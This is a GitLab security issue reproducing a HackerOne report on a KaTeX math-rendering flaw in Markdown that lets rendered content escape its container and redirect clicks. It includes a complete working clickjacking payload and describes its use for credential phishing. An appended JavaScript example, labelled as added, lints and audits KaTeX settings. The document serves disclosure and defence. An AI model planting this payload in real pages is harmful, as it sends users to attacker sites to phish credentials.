Math rendering in markdown can escape container and hijack clicks
⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.
HackerOne report #1887323 by ammar2
on 2023-02-25, assigned to GitLab Team
Report
Summary
KaTeX-based math rendering in Markdown has various features for adjusting the positioning of math elements on screen. Some of these directives can be exploited to escape the usual Markdown rendering container and create elements in unexpected parts of the page. This, coupled with the \href{} command, allows an attacker to hijack some links and buttons on the GitLab UI.
Steps to reproduce
- Go to any system that allows you to render markdown: editing a README, creating an issue, etc.
- Paste the following markdown code:
```math
\hskip{-200pt}
\href{http://ammaraskar.com}{
\smash{\raisebox{20em}{$
\smash{
\raisebox{20em}{$\phantom{
\underset{
\underset{
\underset{
\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}
}{
\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}
}
}{
\underset{
\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}
}{
\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}
}
}
}{
\underset{
\underset{
\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}
}{
\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}
}
}{
\underset{
\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}
}{
\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}
}
}
}
}
$}
}
$}}
}
```
- Clicking almost any UI element in the center panel will bring the user to an attacker-controlled website.
Impact
See impact section at the end.
Examples
I have a reproducer on GitLab.com but the repo visibility is private to prevent anyone from discovering the exploit:
Please let me know if I should add someone to the repo to help triage or if I should export the repo.
What is the current bug behavior?
Markdown renders outside the bounds of what a user would expect, allowing an attacker to easily hijack clicks on GitLab UI elements.
What is the expected correct behavior?
All markdown rendering should be constrained to the expected area and not be able to affect other parts of the page.
Relevant logs and/or screenshots
I have attached a video demonstrating the clickjacking. There are also screenshots without the \phantom element demonstrating the elements rendered to the page.
Output of checks
This bug happens on GitLab.com
Impact
An attacker can exploit this on any README, a comment on a bug, or anywhere else markdown+math is rendered. A popular bug report's comment would be a good target.
Once a user loads the page, clicking on any UI element will take them to an attacker-controlled page. Here, the attacker can try to imitate the GitLab UI and phish for credentials. Unless a user is carefully looking at their URL bar, they might not notice they have been redirected to an attacker's website.
While the naive attack demonstrated above makes one big click-box, one can imagine a more convincing attack would be to place more targeted rectangles on each clickable area with the right target page.
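As an added example (not part of the report above and not GitLab's code), the following JavaScript shows two checks a practitioner would want around KaTeX rendering of untrusted markdown: a pre-render lint that flags oversized or large negative size directives such as the `\hskip{-200pt}`, `\raisebox{20em}` and `\rule{20em}{20em}` the reproducer relies on, and an audit of the KaTeX render options that the attack depends on. `trust`, `maxSize`, `displayMode` and `throwOnError` are real KaTeX option names and the `trust` callback signature (`{command, url, protocol}`) is KaTeX's; the "vulnerable" options object is only an assumption about a configuration that would reproduce the report, the 10em/25em caps and all helper names are assumptions, and the payload excerpt is a constructed shortening of the reproducer.

```javascript
// Added example; not from the HackerOne report or GitLab's code base.
// Real KaTeX option names are used (trust, maxSize, displayMode, throwOnError);
// the caps, helper names and sample inputs below are assumptions.

// Constructed excerpt of the report's payload: the negative \hskip pulls the
// box left out of its container, \raisebox lifts it, and the \rule blocks
// give the \href a large click target.
const reportPayloadExcerpt = String.raw`\hskip{-200pt}
\href{http://ammaraskar.com}{\smash{\raisebox{20em}{$\rule{20em}{20em}\rule{20em}{20em}$}}}`;

// Size-taking KaTeX commands followed by a dimension such as -200pt or 20em.
const SIZE_RE =
  /\\(rule|hskip|hspace|raisebox|kern)\s*\{?\s*(-?\d*\.?\d+)\s*(pt|em|ex|px|cm|mm|in|mu)\s*\}?/g;

// Approximate unit-to-em factors for comparing against a cap (assumes 1em = 12pt).
const TO_EM = {
  em: 1, ex: 0.5, pt: 1 / 12, px: 1 / 16,
  cm: 28.45 / 12, mm: 2.845 / 12, in: 72.27 / 12, mu: 1 / 18,
};

// Lint a math source before rendering: report every explicit size whose
// magnitude exceeds capEm (in em). Negative values are compared by magnitude
// so a large negative \hskip is caught as well as a huge \rule.
function findOversizedDirectives(source, capEm) {
  const hits = [];
  for (const m of source.matchAll(SIZE_RE)) {
    const [, command, number, unit] = m;
    const em = parseFloat(number) * TO_EM[unit];
    if (Math.abs(em) > capEm) {
      hits.push({ command: '\\' + command, value: number + unit, em: Number(em.toFixed(2)) });
    }
  }
  return hits;
}

// KaTeX trust callback: permit \href only for http(s) targets. Everything else
// KaTeX gates behind trust (\url, \includegraphics, \htmlClass, ...) is denied,
// and so are javascript:/data: hrefs.
function trustPolicy(context) {
  return context.command === '\\href' &&
    (context.protocol === 'http' || context.protocol === 'https');
}

// Assumed configuration that would reproduce the report: \href allowed for any
// target and no cap on user-specified sizes (KaTeX's maxSize default is Infinity).
const vulnerableOptions = { displayMode: true, throwOnError: false, trust: true };

// Hardened configuration: a restrictive trust callback plus a size cap. maxSize
// clamps \rule, \hskip and \raisebox arguments to 25em. The rendering container
// still needs CSS containment (e.g. overflow: hidden), because maxSize caps each
// box but not the height of stacked \underset boxes.
const hardenedOptions = { displayMode: true, throwOnError: false, trust: trustPolicy, maxSize: 25 };

// Audit a KaTeX options object for the two settings this report depends on.
function auditKatexOptions(opts) {
  const findings = [];
  if (opts.trust === true) {
    findings.push('trust is unconditionally true: \\href may point at any URL');
  }
  if (!Number.isFinite(opts.maxSize)) {
    findings.push('maxSize is unset/Infinity: \\rule, \\hskip and \\raisebox sizes are unbounded');
  }
  return findings;
}

console.log('lint hits:', findOversizedDirectives(reportPayloadExcerpt, 10));
console.log('vulnerable config:', auditKatexOptions(vulnerableOptions));
console.log('hardened config:', auditKatexOptions(hardenedOptions));
```

The lint is a coarse pre-filter, not a parser: it will not see sizes produced by macro expansion, which is why the options audit (and CSS containment of the `.katex-display` container) matters more than the regex.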
Attachments
Warning: Attachments received through HackerOne, please exercise caution!